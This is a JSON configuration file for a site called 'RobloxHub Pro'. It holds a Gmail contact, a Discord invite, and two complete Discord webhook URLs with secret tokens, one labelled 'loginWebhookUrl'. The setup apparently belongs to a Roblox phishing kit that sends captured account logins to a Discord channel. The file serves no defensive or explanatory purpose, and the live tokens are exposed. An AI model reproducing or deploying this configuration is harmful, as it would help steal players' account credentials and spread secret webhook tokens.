{
  "siteName": "RobloxHub Pro",
  "supportEmail": "RobloxHubPro@gmail.com",
  "discordInvite": "https://discord.gg/STWQQzJ8m",
  "loginWebhookUrl": "https://discord.com/api/webhooks/1549594039450599504/wCDZGfUi1saXZOqpAzrJQbg1ex5UaK-MBVOIvB65VmoRbUjByPHFBOCccdB7wzjEevQc",
  "supportWebhookUrl": "https://discord.com/api/webhooks/1549586460422701126/K5rGWYKqFUj5ipGHueLjRQ8zqdcbwV_5sjwmA2qXssmYwQTCzJFermUJqMf1myvSyU6O"
}